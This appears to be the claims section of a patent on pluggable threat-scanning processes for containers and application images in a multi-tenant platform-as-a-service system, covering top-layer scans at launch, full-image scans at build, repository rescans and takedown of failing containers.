Container and image scanning for a platform-as-a-service system

What is claimed is: 1. A method, comprising: receiving, by a processing device executing a node of a multi-tenant Platform-as-a-Service (PaaS) system, a pluggable scan process to scan containers of the multi-tenant PaaS system to detect patterns indicative of threats to the multi-tenant PaaS system; installing, by the processing device, the pluggable scan process at the node; scanning, by the processing device via the pluggable scan process at the node, a top layer of an application image instance used to launch a container at the node without scanning remaining layers of the application image instance; and in response to the scanning generating a clean result, terminating, by the processing device, the pluggable scan process for the container. 2. The method of claim 1 , wherein the application instance image to provide functionality for an application on the node. 3. The method of claim 1 , wherein the scanning to detect the patterns defined by a definition file of the pluggable scan process. 4. The method of claim 3 , wherein the clean result comprises no patterns detected in the top layer of the application image instance. 5. The method of claim 3 , further comprising in response to the scanning detecting one of the patterns in the top layer of the application image instance, reporting a failure of the pluggable scan process to a monitoring component of the multi-tenant PaaS system in order for the monitoring component to initiate a takedown process for the container that failed the scan process. 6. The method of claim 1 , further comprising performing the scanning on an entirety of an application image of the multi-tenant PaaS system in response to the application image being built at a build system of the multi-tenant PaaS system. 7. The method of claim 6 , wherein information pertaining to the pluggable scan process on the entirety of the application image is reported to and maintained by a central scan data store of the multi-tenant PaaS system, and wherein the information comprises at least an identifier comprising a checksum of the application image as scanned, an identification of the pluggable scan process, a version of a definition file used by the pluggable scan process, and a result of the scanning by the pluggable scan process on the entirety of the application image. 8. The method of claim 1 , further comprising performing the scanning, via the pluggable scan process, on each application image stored in an image repository of the multi-tenant PaaS system in response to a new definition file for the pluggable scan process being received at the image repository. 9. The method of claim 8 , further comprising in response to the scanning of any application image in the image repository results failing, reporting a failure of the pluggable scan process on the application image to a monitoring component of the multi-tenant PaaS system in order for the monitoring component to locate containers executing any instances of the application and initiate a takedown process for the located containers. 10. A system, comprising: a memory; a processing device communicably coupled to the memory, the processing device to: execute a node of a multi-tenant Platform-as-a-Service (PaaS) system; receive a pluggable scan process to scan containers of the multi-tenant PaaS system to detect patterns indicative of threats to the multi-tenant PaaS system; install the pluggable scan process at the node; scan, via the pluggable scan process at the node, a top layer of an application image instance used to launch a container at the node without scanning remaining layers of the application image instance; and in response to the scanning generating a clean result, terminate the pluggable scan process for the container. 11. The system of claim 10 , wherein the application instance image to provide functionality for an application on the node. 12. The system of claim 10 , wherein the scanning to detect patterns defined by a definition file of the pluggable scan process, and wherein the clean result comprises detecting none of the patterns in the top layer of the application image instance. 13. The system of claim 12 , wherein the processing device further to, in response to the scanning detecting one of the patterns in the top layer of the application image instance, report a failure of the pluggable scan process to a monitoring component of the multi-tenant PaaS system in order for the monitoring component to initiate a takedown process for the container that failed the scan process. 14. The system of claim 10 , wherein the processing device further to perform the scan process on an entirety of an application image of the multi-tenant PaaS system when the application image is built at a build system of the multi-tenant PaaS system. 15. The system of claim 10 , wherein the processing device further to perform the scanning, via the pluggable scan process, on each application image stored in an image repository of the multi-tenant PaaS system in response to a new definition file for the pluggable scan process being received at the image repository. 16. A non-transitory machine-readable storage medium including instructions that, when accessed by a processing device, cause the processing device to: receive, by the processing device executing a node of a multi-tenant Platform-as-a-Service (PaaS) system, a pluggable scan process to scan containers of the multi-tenant PaaS system to detect patterns indicative of threats to the multi-tenant PaaS system; install, by the processing device, the pluggable scan process at the node; scan, by the processing device via the pluggable scan process at the node, a top layer of an application image instance used to launch a container at the node without scanning remaining layers of the application image instance; and in response to the scanning generating a clean result, terminate, by the processing device, the pluggable scan process for the container. 17. The non-transitory machine-readable storage medium of claim 16 , wherein the scanning to detect the patterns defined by a definition file of the pluggable scan process, and wherein the clean result comprises detecting none of the patterns in the top layer of the application image instance. 18. The non-transitory machine-readable storage medium of claim 17 , wherein the processing device further to, in response to the scanning detecting one of the patterns in the top layer of the application image instance, report a failure of the scanning to a monitoring component of the multi-tenant PaaS system in order for the monitoring component to initiate a takedown process for the container that failed the scan process. 19. The non-transitory machine-readable storage medium of claim 16 , wherein the processing device further to perform the scanning, via the pluggable scan process, on an entirety of an application image of the multi-tenant PaaS system in response to the application image being built at a build system of the multi-tenant PaaS system. 20. The non-transitory machine-readable storage medium of claim 16 , wherein the processing device further to perform the scanning, via the pluggable scan process, on each application image stored in an image repository of the multi-tenant PaaS system in response to a new definition file for the scan process being received at the image repository.